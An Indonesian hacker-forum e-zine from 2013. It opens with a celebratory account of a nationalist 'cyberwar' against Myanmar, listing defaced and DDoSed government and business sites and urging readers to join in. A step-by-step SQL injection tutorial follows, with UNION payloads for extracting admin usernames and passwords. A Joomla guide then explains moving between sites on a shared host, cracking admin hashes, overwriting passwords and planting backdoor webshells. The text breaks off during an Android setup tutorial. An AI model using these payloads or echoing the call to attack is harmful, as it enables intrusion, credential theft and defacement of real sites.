1

KATA PENGANTAR
Puji syukur kita haturkan kepada kehadirat Tuhan, atas nikmat iman, ukhwah dan silaturahmi ini sehingga
kekeluargaan kita tetap terbangun dan terawat di bawah naungan berbagai macam Agama.

Pembaca, semoga gemilang dengan kehadiran sebuah Magazine dari forum kami yaitu Indonesian Hacker Team
edisi pertama ini dapat bermanfaat bagi semua khususnya anggota atau member IH, beserta staff dan
administrator. Dan juga semoga para pembaca tidak kecewa terhadap isi dari IH-Zine ini.

Mendidik dan mencerdaskan generasi muda bangsa merupakan kewajiban semua pihak, staff dan administrator
juga yang berpartisipasi dalam pembuatan IH-Zine ini dengan pengalamannya dalam bidang IT mencoba
menularkan ilmu dan pengalamannya dalam sebuah magazine ebook ini.

Namun yang membuat karya ini lebih luar biasa adalah kerja keras menyusun ebook ini semata-mata demi
berbagi ilmu tanpa tujuan komersialisasi. Untuk itu ebook ini berlisensi free to public, atau GNU.
Sekian dan terima kasih atas dukungan dari pembaca dan perhatiannya. Dan kami sangat mengharapkan donasi
dan menjadi member aktif di http://indonesianhacker.or.id/

Bogor, Februari 2013

xevil
( Penyusun IH Zine )

2
 IH-Zine 01
IH-Zine adalah sebuah buku elektronik buatan Indonesian Hacker Team yang bertujuan untuk menambah
wawasan para pembaca tentang dunia IT atau dunia hacking seperti pembahasan mengenai programming,
networking, virus dan lain lain.

Seluruh materi IH Zine dapat didownload, dibaca, disebarkan secara bebas untuk tujuan bukan
komersial(nonprofit), dengan syarat tidak menghapus atau merubah nama penulis.

IH-Zine 01 adalah edisi pertama yang akan kami hadirkan untuk anda.

Diterbitkan oleh :
Indonesian Hacker Team

Redaksi :
IH Crew

Desain Cover :
xevil - Cyberkaze

Layouter :
xevil

Editor :
Anharku

Distribusi :
All Members Indonesian Hacker

3
.Daftar Isi

CYBERWAR INDONESIA VS MYANMAR [5]

Apa itu Hacker ? [12]

Tingkatan Masyarakat Hacker [13]

Tutorial SQL Injection Step by Step [15]

Jumping CMS Joomla [18]

Membuat Program Android | Web Launcher [22]

Mass Deface [33]

Membuat Shell Dengan ekstensi .php;jpg [38]

Dissable PHP dengan .htaccess [41]

Remote SQL [43]

Mass Deface [2] [49]

Donasi Indonesian Hacker [54]

4
CYBERWAR INDONESIA VS MYANMAR

Konflik yang terjadi antara etnis rakhine dan rohingya di myanmar pada bulan mei-juni lalu menyita banyak
perhatian dari pelosok dunia. Diawali dengan diperkosa lalu dibunuhnya seorang wanita budha (etnis rakhine) oleh 3
orang pemuda muslim (etnis rohingya). Itulah awal bencana, pihak rakhine yang tidak terima perlakuan seperti itu
terhadap wanita dari etnis mereka akhirnya balas menyerang. Mendapat penyerangan dari etnis rakhine etnis
rohingya juga melakukan penyerangan balik, maka saling serang tidak dapat dihindarkan lagi, korban dari kedua
belah pihak tidak dapat dihindarkan. Kehilangan nyawa, tempat tinggal bahkan tempat ibadah dari kedua belah
pihak (mesjid dan juga monastries/tempat ibadah umat budha). Tercatat 77 orang meninggal dunia, 109 luka-luka, 5
ribuan rumah rusak/dibakar, 17 mesjid dan 15 monastries (rumah ibadah umat budha myanmar) rusak. Akibat dari
konflik yang berkelanjutan menimbulkan gelombang pengungsian besar-besaran. Akhirnya dunia mengetahui itu,
protes dilakukan oleh berbagai pihak ke pemerintahan myanmar, baik dari pemimpinin beberapa negara, dari
aktivis, termasuk aktivis dari dunia maya.

#OP MYANMAR 1 (2012)

Seperti yang kita ketahui hal tersebut diatas itulah yang melahirkan #op myanmar pertama (
http://anonnews.org/press/item/1720/ ) yang dimotori oleh anonymous global,

"Burmese Government does not consider Rohingya Muslims as citizens and are hated by the Buddhists. Rohingyans
have long demanded recognition as an indigenous ethnic group with full citizenship by birthright, claiming a
centuries-old lineage in Rakhine. But the Government regards them as illegal immigrants from neighbouring
Bangladesh and denies them citizenship".

"Pemerintah Burma tidak mengakui muslim rohingya sebagai warga negara dan mereka dibenci oleh umat buddha.
Rohingya telah lama menuntut agar diakui sebagai pribumi dengan hak kewarganegaraan penuh, dan mengklaim
merupakan garis keturunan yang sudah berabad-abad ada di rakhine. Namun Pemerintah menganggap mereka
sebagai imigran ilegal dari negara tetangga Bangladesh dan menyangkal kewarganegaraan mereka".

Bukan hanya presidennya bahkan warga rakhine juga tidak mau mengakui etnis rohingya sebagai warga negara yang
sah. Sebagai rasa solidaritas dan rasa kemanusiaan terhadap muslim dimyanmar anonymous global dan para
pejuang dunia maya indonesia mengambil bagian di event itu, dengan serangan DDOS yang bertubi-tubi dari
berbagai Negara mengakibatkan situs presiden myanmar down, dirasa misi waktu itu telah tercapai akhirnya #op
berhenti sampai disitu.

#OP Green Internet

By Rio Permana White and 19 others Sunday, March 31, 2013

Indonesian Fighter Cyber

OP ini bertujuan untuk menghapus situs-situs yang berisikan hinaan, pelecehan dan fitnah pada agama. Juga untuk
melenyapkan situs-situs yang berisikan pornografi yang berlebihan, phedofilia, beastialitas atau zoophilia

OP is intended to remove sites that contain insults, harassment and defamation of religion. also to eliminate sites
containing pornography excessive, phedofilia, beastiality or zoophilia

5
http://www.facebook.com/events/321214177984983/

Nah.. disinilah awal permasalahan baru, ketika itu para Indonesia Fighter Cyber tengah menjalankan misi tiba-tiba
nongol hacker myanmar yang memamerkan seperti dibawah :

http://www.hack-mirror.com/178932.html

Sebagai Muslims dan sebagai warga negara Indonesia tentunya tidak suka melihat itu. Mereka juga bahkan
mengeluarkan kata-kata kasar di events itu, berangkat dari itu #Op Myanmar lanjutan lahir kembali
http://www.facebook.com/groups/operation.mm/ yang dimotori oleh kk Rio Permana White dkk.

"Operasi ini bertujuan untuk membalas hinaan hacker-hacker myanmar yang telah meretas site-site Indonesia dan
merubah tampilan dengan gambar yang sangat menistakan.

Penghinaan dan penistaan agama Islam oleh hacker-hacker myanmar akan kami balas dengan tepat, kami akan
rontokkan website-website myanmar, mari bergabung bersama kami".

#OP myanmar 2013

6
BHG banyak owned fb, fp dan juga blog yang berbau islam dan mensuport rohingya, juga menddos dan mendeface
situs-situs yang dimiliki oleh rohingya dan tentunya situs-situs Indonesia. Tidak hanya itu mereka juga bahkan pernah
mendeface situs negara merekasendiri diawal tahun kamaren hanya sekedar ngucapin selamat tahun baru kepada
pemilik situs. Mereka akan melakukan penyerangan balik terhadap sesiapa yang mereka anggap menentang dengan
prinsip mereka.

"In what has been a rough few days for web administrators around the world as hacker go nuts hacking and defacing
sites, leaking data in celebration of the new year, 2013. One of the latest attacks is from a group named BHG aka
blink hacker group that has left around 1000 Myanmar information and service based websites defaced . Myanmar
is another named for Burma. The defacement comes with no real message besides happy new year and at time of
publishing all sites checked appeared to still be defaced".

http://pastebin.com/w1KdeK2v (list of myanmar site that got hacked by BHG blink hacker group)

Mungkin karena itu group fb nya hilang mungkin saja.

http://www.facebook.com/BlinkHackerGroup (gone)

Fb yang ditake over :

https://www.facebook.com/groups/myanmarmuslim.ecs/
https://www.facebook.com/groups/leemuslims/
https://www.facebook.com/groups/Miraclesinislam/
https://www.facebook.com/groups/islamisnarbuu/
http://www.facebook.com/OpMYANMAR
http://www.facebook.com/aljazeeraburma

Yang pernah mereka ddos :

www.rohingyalanguagefoundation.com

Blog take over :

http://burmese.rohingyablogger.com/
https://www.facebook.com/FreerohingyaBlogger
http://saverohingyas.blogspot.com/
http://freerohingya.blogspot.com/

Website defaced :

Burmese Muslims Education and Community Center (Masjid Al-Noor Ul-Islam)

http://www.bmeccfw.org/
www.allmuslimworld.com
www.radiomuslim.net
www.blinkhackergroup.org/2013/02/more-than-100-indonesia-sites.html
7
sumber http://www.blinkhackergroup.org

Kata-kata kasar juga terlontar dari admin dan member dari

http://www.facebook.com/BrotherhoodOfMyanmarHackers ,sungguh suatu pemandangan yang sangat
mengesalkan.

total sementara site indonesia yang dideface

~ dari sumber hack-db.com http://www.4ngelc0de.com/2013/02/kumpulan-website- idonesia-yang-

di.html

~ dari http://www.facebook.com/BrotherhoodOfMyanmarHackers
~ dan lain-lain

Miris melihat itu semua, usaha persuasif pun dilakukan, agar mereka menghentikan merusak website-website
Indonesia tetapi mereka sedikit pun tidak mau peduli mereka tetap beranggapan kalau sebenarnya kitalah yang
memulai duluan, sampai sekarang mereka masih melakukan pengrusakan ke situs-situs Indonesia.

Tidak ada cara lain saya harus mengikuti #op myanmar untuk membantu teman-teman dalam memperjuangkan Ibu
Pertiwi, mereka telah menghina Ibu Pertiwi.

http://www.facebook.com/BrotherhoodOfMyanmarHackers/posts/612348512114514

Siapa lagi yang akan membela agama dan tanah air kalau tidak kita-kita, berbanggalah wahai para pejabat kalian
punya kami-kami yang selalu bersedia membela tanah air nusa dan bangsa tanpa pamrih walau hanya lewat dunia
maya tidak seperti sebagian dari kalian para pejabat yang hanya memikirkan dirinya sendiri dan selalu memikirkan
pamrih dalam melaksanakan tugas.

#op myanmar juga sudah membuahkan beberapa hasil, seperti didefacenya beberapa situs myanmar tapi yang
terpenting kami juga sudah berhasil menDDOS beberapa situs vital myanmar.

8
Op myanmar akan berhenti kalau mereka para hacker myanmar berhenti merusak situs-situs Indonesia, sampai saat
ini mereka masih merusak website Indonesia, oleh sebab itu biar misi cepat tercapai kami menghimbau teman-
teman setanah air marilah kita bersatu hati bersatu tekad bersatu langkah untuk membela Indonesia, apa pun cara
yang kamu-kamu bisa lakukan sumbangsih mu sangat dibutuhkan.

MYANMAR GOT SHOCKS

A de ial of se i e atta k DDo“ as lau hed agai st the p eside t’s offi e. A o di g to p eside tial
spokesperson Zaw Htay, the site was first attacked on 5 February from 9am to 10am. Around 11am, DDOS
flooding, originating from IP addresses in Russia, Malaysia and America began assaulting the site.

http://www.dvb.no/news/cyber-assault-brings-down-presidential-website/26208

https://twitter.com/HmuuZaw/status/298695503519039489

https://www.facebook.com/photo.php?fbid=388722961224798&set=a.101379746625789.2560.1000026
12916066&type=1&theater

http://www.articles.myanmaronlinecentre.com/president-offices-website-hacked/

Saat ini sudah ada beberapa site myanmar sudah berhasil ddos/dideface, mengalami kendala dalam
mendeface soalnya mereka tidak ada google nya websitenya juga sedikit bahasa yang sulit ditranslatekan
dan beberapa kendala lainnya.

List Site Deface :

http://www.ourmyanmar.org/ SS http://prntscr.com/sg1e9
http://www.myanmarcatholiccommunity.com/ SS http://prntscr.com/tkz57
http://myanmarbizdirectory.com/ SS http://prntscr.com/syed7
http://myanmarfishexporter.com/ SS http://prntscr.com/syele
http://myanmartravelguides.com/ SS http://prntscr.com/syepm
http://royalgoldentortoise.com/ SS http://prntscr.com/syexb
http://talentsnmodels.com/ SS http://prntscr.com/syf32
http://tinaungzawtrading.com/ SS http://prntscr.com/syf5j
http://tinmoelwin.com/ SS http://prntscr.com/syfa5 (Deface)
http://trailsofmyanmartravel.com/ SS http://prntscr.com/tl4fr
http://myasoc.com.mm/ SS http://prntscr.com/todg8 (Deface)
http://www.mvces.net/ SS http://prntscr.com/todne (Deface)
http://burma-forums.com/forum/ SS http://prntscr.com/ttuno
http://www.scenicmyanmar.com/ SS http://prntscr.com/tvh92
http://prs-international.org/ SS http://prntscr.com/ty7zp
http://www.asmbuilding.com/ SS http://prntscr.com/tybf2
http://maihsoongtravel.com/ SS http://prntscr.com/tysya
http://www.worldmyanmartravel.com/ SS http://prntscr.com/u2ycb
http://www.goldenpasstravel.com/ SS http://prntscr.com/u89qb
http://panmintk.com/ SS http://prntscr.com/u8a8c (Deface)
http://www.soccerweeklytips.com/ SS http://prntscr.com/u8apf

9
Site Down dan pernah Down :

cbbank.com.mm SS http://prntscr.com/tk85pcc
dac.gov.mm SS http://prntscr.com/tk88y

courts.com.mm SS http://prntscr.com/tk8bo
csostat.gov.mm SS http://prntscr.com/tk8dg
dmh.gov.mm SS http://prntscr.com/tk8i0
dot.gov.mm SS http://prntscr.com/tk8ki
elearning.edu.mm SS http://prntscr.com/tk8mj
elibrary.com.mm SS http://prntscr.com/tk8py
energy.gov.mm SS http://prntscr.com/tk8so
gmismofa.gov.mm SS http://prntscr.com/tk8w8
hantharwaddy.net.mm SS http://prntscr.com/tk8xs
hotel-tourism.gov.mm SS http://prntscr.com/tk92
gind1.gov.mm SS http://prntscr.com/tk96j
industry2.gov.mm SS http://prntscr.com/tk98y
irrigation.gov.mm SS http://prntscr.com/tk9bp
itbmu.org.mm
iwt.gov.mm
khitlunge.com.mm
khitlunge.net.mm
khitlunge.org.mm
livestock-fisheries.gov.mm
mahasi.org.mm
mcc.com.mm
mcit.gov.mm
mcpa.org.mm
mcpt-dems.gov.mm
mcpt.gov.mm SS http://prntscr.com/u5x3w
meb.com.mm
mmcert.org.mm
mnped.gov.mm
moai.gov.mm
moc.gov.mm
moezala.gov.mm
mofa.gov.mm
mol.gov.mm
mora.gov.mm
most.gov.mm
mpce-moai.gov.mm
mpt.net.mm
mptmail.com.mm
mptmail.net.mm
mptngw.net.mm
mrtv3.net.mm
mrtv4.net.mm
myancoop.gov.mm
myanmar.net.mm
myanmarevisa.gov.mm
10
myanmarinfotech.com.mm
myanmarnlp.org.mm
myanmarteldir.com.mm
myanmaryouth.net.mm
nic.net.mm
nlm.gov.mm
npt.net.mm
people.com.mm
president-office.gov.mm
rubyland.com.mm
ssbmyanmar.gov.mm
tawwincentre.com.mm
ucsy.edu.mm
uec.gov.mm
usda.org.mm
usdp.org.mm
wbts.com.mm
wpiteam.net.mm
yatanarponteleport.net.mm

Sumber IFC (Indonesia Fighter Cyber)

Inilah yang dilakukan oleh Garuda Muda underground Indonesia, sungguh suatu hal yang patut dibanggakan, walau
pun hanya lewat dunia maya, generasi muda Indonesia tetap selalu sedia membela bumi pertiwi tanpa pamrih :)

./ Written by ANGEL DOT ID

11
.Apa itu Hacker?

Sebelum kita belajar lebih lanjut mengenai dunia hacking, ada baiknya kita mengetahui definisi hacker terlebih
dahulu. Ada beberapa pengertian hacker, dilihat dari berbagai latar belakang.

1. Menurut Orang Awam IT

Hacker adalah orang yang merusak sebuah sistem.
Hacker adalah orang yang mencuri data milik orang lain melalui jaringan internet.
Hacker adalah orang yang mempunyai kemampuan menganalisa kelemahan suatu sistem atau situs.

2.Menurut Orang Middle IT

Hacker adalah Sebutan untuk mereka yang memberikan sumbangan yang bermanfaat kepada jaringan komputer,
membuat program kecil dan memberikannya dengan orang-orang diinternet.

3. Menurut Orang Highly IT

Hacker adalah Hacker merupakan golongan profesional komputer atau IT, merekamungkin terdiri daripada
ahlikomputer, administrator dan sebagainya yang memiliki pengetahuan tinggi dalam sesuatu sistem komputer.
Hacker mempunyai minat serta pengetahuan yang mendalam dalam dunia IT sehingga berkeupayaan untuk
mengenal pasti kelemahan suatu sistem dengan melakukan uji coba terhadap sesuatu sistem tersebut. Namun, para
hacker tidak akan melakukan kerusakan terhadap sesuatu sistem dan ia adalah etikaseorang hacker.

. ApaituCracker?

Cracker adalah sebutan untuk mereka yang masuk ke sistem orang lain tetapi lebih bersifat destruktif, biasanya di
jaringan komputer, mem-bypass password atau lisensi program komputer, secara sengaja melawan keamanan
komputer, men-deface (merubah halaman depan web) milik orang lain bahkan hingga men-delete data orang lain,
danmencuri data.Hacker is not Cracker.

. ApaituCarder?

Carder merupakansebutan untuk orang yang menggunakan kartu kredit. Istilah ini banyak digunakan untuk para
pemegang kartu kredit yang digunakan secara ilegal dengan maksud untuk melakukan berbagai kegiatan yang salah.
Misalnya menggunakan kartu kredit orang lain tanpa sepengetahuan atau seizin pemilik kartu tersebut untuk suatu
pembayaran yang dilakukan secara online di Internet. Para carder biasanya mendapatkan nomor kartu dengan
beberapa cara. Cara yang paling {primitif} adalah dengan mengais-ngais nota transaksi kartu kredit di pusat-pusat
perbelanjaan.

Sumber : http://www.google.com

12
. Tingkatan Masyarakat Hacker

Beberapa bagian dari tulisan asli telah mengalami modifikasi dan penyesuaian. Beberapa yang kurang tepat juga
telah saya hapus dan saya sesuaikan relatif terhadap pendapat saya sendiri. Mohon maaf.Pada dasarnya, setiap
pelaku TI atau praktisi hacking itu sendiri mendefenisikan konsep 'HACKING' yang berbeda. Tidak tertutup
kemungkinan untuk terjadi perbedaan pendapat terhadap konsep yang di makhsud, namun cukup jadikan
perbedaan pendapat sebagai sebuah kekayaan pemikiran.Dalam perjalanan menuju pendewasaan, perubahan pola
pikir dan kemampuan teknik, setiap manusia yang memasuki wilayah hacking akan melewati beberapa tingkatan.

1.Si Dungu
Saya rasa tidak berlebihan untuk menyebut masyarakat pada tingkatan ini dengan istilah dungu. Mereka hanya
memiliki kemampuan teknis komputer yang rendah dan mengenal hacking dari surat kabar, bahwa hacker adalah
seorang penjahat elektronik. Bahkan beberapa diantara mereka juga menulis di surat kabar dalam hal dan konsep
yang sama.

2.Si Lamer
Lamer merupakan sebuah fenomenal awal remaja yang tertarik mempelajari hacking. Mereka mempunyai
kemampuan komputer standar dan sedikit lebih banyak mendapat informasi.Mereka mencoba mencari petunjuk
serangan praktis. Baik dari e-zine maupun melalui diskusi IRC (Chatting). Serangan dilakukan dengan trojan, sebuah
remote administration tool yang memberikan akses terhadap mesin yang telah terinfeksi. Lamer juga melakukan
benyak hal-hal tidak berguna, seperti tukar-menukar nomor kartu kredit, dan tukar-menukar password website
porno komersial. Hacker yang kompeten, atau remaja yang berhasil lolos dari 'seleksi alam' akan melalui masa ini
dengan begitu cepat memasuki wilayah penuh keingintahuan.

3.Wannabe
Wannabe hacker menganggap hacking lebih sebagai philosophy, atau seni kehidupan. Mereka mulai membaca
teknik-teknik hacking dasar dan melakukan searching (pencarian) dokumen-dokumen hack yang lebih serius.
Wannabe telah menunjukkan antusiasnya dalam hacking dan mulai meninggalkan dunia lamer yang penuh
kebodohan.

4.Larva
Perjalanan penuh perjuangan menjadi kupu-kupu. Larva telah disibukkan dengan berbagai pertanyaan bagaimana
benda-benda bekerja ? Bagaimana dunia bekerja. Larva adalah step terpenting dalam pembentukan jati diri
hacker.Mereka menemukan cara untuk membuat eksploits sendiri. Mencoba melakukan penetrasi sistem tanpa
melakukan pengerusakan, karena mereka tahu, pengerusakan sistem adalah cara termudah bagi mereka (sysadmin
dan polisi) untuk menangkap jejak sang larva.

5.Hacker
Sebuah keindahan, naluri, karunia tuhan terhadap orang-orang yang berjuang. Akhirnya tingkatan tertinggi dari
budaya digital telah dicapai. Sebuah dunia baru menanti. Dunia hacking !!Sesunguhnya setiap orang tidak akan tau
kapan pastinya ia menjadi hacker. Sama halnya dengan anda tidak pernah tau pasti kapan anda tertidur. Hal
terpenting adalah terus belajar dan mengembangkan pengetahuan. Saat anda beristirahat sejenak dan mengenang
kembali anda telah menjadi hacker.

13
. Special Skill

Hacker dalam tahap pendewasaannya akan mengalami spesialisasi skil/kemampuan.

Mereka akan dikenal sebagai:

1.Wizard
Yaitu seseorang yang memiliki pengetahuan yang begitu banyak terhadap subyek tertentu.

2.Guru
Seseorang yang tau apapun tehadap subyek tertentu. Mereka mengetahui fitur-fitur tak terdokumentasi. Trik-trik
pengembangan, dan teknik-teknik mengalahkan keterbatasan.

Hacker sejati mengenal kebodohannya dan terus mengembangkan diri untuk mengatasi semua kebodohannya. Dan
dalam perjalanan itu alam mengadakan seleksi, siapakah yang mampu bertahan ?

Thread Starter : kod0k™

Source : http://iht.or.id/6189

14
.Tutorial SQL Injection Step by Step (For Dummies)

Pengertian sqlinjection:

SQLinjection adalah sebuah aksi hacking yang dilakukan di aplikasi client dengan cara memodifikasi perintah SQL
yang ada di memori aplikasi clien dan juga merupakan teknik mengeksploitasi web aplikasi yang didalamnya
menggunakan database untuk penyimpanan data.

Yang perlu di ketahui sebelum sqlinjection pada mysql:

karakter: ' atau -
comments: /* atau --
information_schema untuk versi: mysql versi 5.x , tidak support untuk mysql versi 4.x

.Step 1
carilah target
misal: [site]/berita.php?id=100

Tambahkan karakter ' pada akhir url atau menambahkan karakter "-" untuk melihat apakah ada pesan error.
contoh:
[site]/berita.php?id=100' atau
[site]/berita.php?id=-100
ehingga muncul pesan error seperti berikut (masih bnyak lagi):

.Step 2
mencari dan menghitung jumlah table yang ada dalam databasenya...
gunakan perintah : order by

contoh:

[site]/berita.php?id=-100+order+by+1-- atau
[site]/berita.php?id=-100+order+by+1/*

ceklah secara step by step (satupersatu)...

misal:

[site]/berita.php?id=-100+order+by+1--
[site]/berita.php?id=-100+order+by+2--
[site]/berita.php?id=-100+order+by+3--
[site]/berita.php?id=-100+order+by+4--

sehingga muncul error atau hilang pesan error...

misal: [site]/berita.php?id=-100+order+by+9--

berarti yang kita ambil adalah sampai angka 8

menjadi [site]/berita.php?id=-100+order+by+8—

15
.Step 3
untuk mengeluarkan angka berapa yang muncul gunakan perintah union
karena tadi error sampai angka 9
maka: [site]/berita.php?id=-100+union+select+1,2,3,4,5,6,7,8--

ok seumpama yg keluar angka 5

gunakan perintah version() atau @@version untuk mengecek versi sql yg diapakai masukan perintah tsb pada nagka
yg keluar tadi
misal:
[site]/berita.php?id=-100+union+select+1,2,3,4,version(),6,7,8—
atau
[site]/berita.php?id=-100+union+select+1,2,3,4,@@version,6,7,8--

lihat versi yg digunakan seumpama versi 4 tinggalkan saja karena dalam ver 4 ini kita harus menebak sendiri table n
column yg ada pada web tersebut karena tidak bisa menggunakan perintah From+Information_schema..

untuk versi 5 berarti anda beruntung tak perlu menebak table n column seperti ver 4 karena di ver 5 ini bisa
menggunakan perintah From+Information_schema..

.Step 4
untuk menampilkan table yg ada pada web tsb adalah
perintah table_name >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables/* >>> dimasukan setelah angka terakhir

Code:

[site]/berita.php?id=-100+union+select+1,2,3,4,table_name,6,7,8+from+inf ormation_schema.tables--

seumpama table yang muncul adalah "admin"

.Step 5
untuk menampilkan semua isi dari table tsb adalah
perintah group_concat(table_name) >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables+where+table_schema =database() >>> dimasukan setelah angka
terakhir

[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(table_name),
6,7,8+from+information_schema.tables+where+table_s chema=database()--

.Step 6
perintah group_concat(column_name) >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.columns+where+table_name= 0xhexa-- >>> dimasukan setelah angka terakhir

[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name)
,6,7,8+from+information_schema.columns+where+table _name=0xhexa--

16
pada tahap ini kamu wajib mengextrak kata pada isi table menjadi hexadecimal yaitu dengan cara mengkonversinya
website yg digunakan untuk konversi :http://www.v3n0m.net/ascii.htm

contoh kata yg ingin di konversi yaitu admin maka akan menjadi 61646D696E

[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name)
,6,7,8+from+information_schema.columns+where+table _name=0x61646D696E--

.Step 7
memunculkan apa yg tadi telah dikeluarkan dari table yaitu dengan cara :

perintah concat_ws(0x3a,hasil isi column yg mau dikeluarkan) >>> dimasukan pada angka yg keluar tadi
perintah +from+(nama table berasal) >>> dimasukan setelah angka terakhir

Contoh :

[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,hasil isi column),6,7,8+from+(nama table berasal)--

contoh kata yang keluar adalah id,username,password

Contoh :

[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,id,usernam e,password),6,7,8+from+admin--

.Step 8
tahap terakhir mencari halam admin atau login .

Thread Starter : o[ 0de]™

Source : http://iht.or.id/4491

17
. Jumping CMS Joomla

Assalamualaikum,wr,wb ,Alhamdulilah masih diberi kesempatan untuk menulis artikel cupu ini. Anggap saja saya
sudah berhasil menjebol sebuah website dengan bug yang saya dapat dari exploit-db, lalu saya ingin melakukan
jumping. Misalkan saya mendapatkan sebuah file configuration.php pada directory website lain yang masih dalam 1
server. Seperti berikut

Data2 diatas dapat saya manfaatkan untuk masuk ke dalam koneksi SQL database dari website tersebut, tinggal tulis
username sesuai $user, password =$password database=$db

18
Pilih table jos_user atau kalau gambar diatas ppxe3_user untuk mengetahui data ADMIN

Lihat bagian hash password:

f060ab30829368d35cae7bc0d5252324:x9JKZJwdbgOQbLngYX7kOs3DOgw7tHpZ

joomla hash password biasanya adalah kombinasi dari MD5+SALT , coba buka

http://www.subclosure.com/generate-new-joomla-1-5-md5salt-encrypted-passwords-to-store-
in-database.html

sebagai contoh kita generate password admin hasilnya adalah

914adbb037c5cddeb4a029999bf0a297:n2GhvPnJdS3vblA0RLbhuSdFyBTDfnuH

19
Disini kita menggunakan Joomla Password Cracker di:

http://codenesia.com/t00l/joomlapass.php

Joomla Password Cracker adalah tool yang digunakan untuk mengkalkulasi hash password joomla berdasarkan data
kata yang ada pada wordlist (kamus.txt) jadi jika datanya tidak ada dalam kamus kemungkinan hasilnya tidakbisa
ditemukan. Masih ada cara lain untuk mencari joomla hash (md5+salt) password yaitu dengan menggunakan tool
hashcat http://www.hashcat.net/files/hashcat-gui-0.4.2.7z untuk cara pakainya bisa lihat video ini
www.youtube.com/watch?v=b5ATmeNg2Vw

Ternyata password asli dari: f060ab30829368d35cae7bc0d5252324:x9JKZJwdbgOQbLngYX7kOs3DOgw7tHpZ

adalah : qwerty , lanjut dengan login dari http://target.com/administrator/

Cara kedua adalah dengan edit data user:

Klik tanda pensil (edit data) pada pinggir table webshell tersebut maka akan muncul table seperti dibawah ini:

20
Pada bagian password pilih tipe MD5 lalu isi valuenya dengan passwordnya misal admin (baik joomla maupun
wordpress untuk menembus bagian password admin panel bisa menggunakan cara ini, karena sama2 senis
hashnya MD5 ).

Coba login dengan username admin dan password admin sesuai dengan perubahan yang kita lakukan pada SQL tadi.

Kalau sudah bisa masuk ke ADMIN PANEL JOOMLA seperti diatas kita lanjutkan dengan aksi tanam TUYUL alias
tanam backdoor dengan mengupload webshell dari bagian Upload Image (tapi lebih dulu setting Configuration nya
allow .php) Content--> Media Manager , atau bisa juga upload lewat Extension Manager: Install (webshell
digabungkan bersama dalam module /dipack).

21
 Nothing is “e ure

referensi:

http://docs.joomla.org/How_you_reset_an_administrator_password%3F
http://docs.joomla.org/Password_parameter_type
http://en.wikipedia.org/wiki/Password_salting
http://php.net/manual/en/faq.passwords.php

Nick : anharku a.k.a r13y5h4

Join Date IH : May 2010
Status : Just a Newbie
Home : http://codenesia.com
Email : [email protected]
FB : http://facebook.com/anharku
Tweet : @anharku

22
. Membuat Program Android | Web Launcher

Mungkin sudah banyak tutorial di internet yang membahas mengenai Web Launcher di Android, tapi disini
saya akan menjelaskan lebih detail dan bertahap, kalau online kadang suka males kan baca kalau
kepanjangan :D, jadi saya buat tutorial ini, langsung aja kalau begitu.
Peralatan tempurnya nih :
- Eclipse, ( saya pake Eclipse Java Development, Code namenya JUNO )
Download
- SDK Android
Download
- Java Development Kit
Download
- ADT Plugin ( ini ada dua cara nanti kita bahas ok )
- Secangkir Kopi ( Ambil Di dapurnya masing2 ^_^ )

Oke kalau semua perlengkapan sudah lengkap sekarang kita mulai installasi Eclipse agar bisa digunakan
untuk development aplikasi android, langsung aja liat dibawah tutorial install eclipse.
Langkah – langkah install eclipse :
1. Pertama install dulu JDK yang sudah kita download,
2. Jika tahap pertama sudah selesai, lalu install SDK Androidnya
3. Oke SDK sudah kita lanjut, sekarang extract file2 Eclipse, karena Eclipse itu aplikasi portable jadi
tidak perlu di install dikomputer kita
4. Setelah selesai kita jalankan eclipse
Setelah terbuka tampilan utama eclipse, klik tab window, klik preferences, jika sudah muncul menu
preferences klik Android, lalu disana kita browse untuk menentukan tempat SDK yang tadi kitas
udah install

23
SS tampilan preferences :

